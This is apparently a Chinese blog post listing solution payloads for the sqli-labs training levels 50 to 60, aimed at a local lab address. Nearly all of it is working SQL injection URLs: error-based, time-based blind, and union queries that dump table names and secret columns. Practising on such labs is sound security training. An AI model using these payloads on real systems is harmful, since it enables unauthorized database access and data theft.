【20171105早】sqli-libs Less 50-60
时间:2021-07-01 10:21:17
帮助过:10人阅读
Less 50
2 http://192.168.162.135/sqli-libs/Less-50/?sort=1 and extractvalue(1, concat(0x7e, database()))--+
3 Less 51
4 http://192.168.162.135/sqli-libs/Less-51/?sort=1‘ and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
5 Less 52
6 http://192.168.162.135/sqli-libs/Less-52/?sort=1 and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
7 Less 53
8 http://192.168.162.135/sqli-libs/Less-53/?sort=1‘ and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
9 Less 54
10 http://192.168.162.135/sqli-libs/Less-54/?id=-1‘ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘ --+
11 http://192.168.162.135/sqli-libs/Less-54/?id=-1‘ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =‘challenges‘ and table_name=‘POV9ATA70T‘)--+
12 http://192.168.162.135/sqli-libs/Less-54/?id=-1‘ union select 1,2,(select group_concat(id,0x7c,sessid,0x7c,secret_Y7BB,0x7c,tryy) from challenges.POV9ATA70T)--+
13 http://192.168.162.135/sqli-libs/Less-54/?id=-1‘ union select 1,version(),database()--+
14 Less 55
15 http://192.168.162.135/sqli-libs/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘ --+
16 Less 56
17 http://192.168.162.135/sqli-libs/Less-56/?id=-1‘) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘ --+
18 Less 57
19 http://192.168.162.135/sqli-libs/Less-57/?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘ --+
20 Less 58
21 http://192.168.162.135/sqli-libs/Less-58/?id=-1‘ union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘), 0x7e))--+
22 Less 59:
23 http://192.168.162.135/sqli-libs/Less-59/?id=-1 union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘), 0x7e))--+
24 Less 60:
25 http://192.168.162.135/sqli-libs/Less-60/?id=-1") union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘), 0x7e))--+
【20171105早】sqli-libs Less 50-60
标签:nbsp orm base concat mat 基本 asc 没有 cat
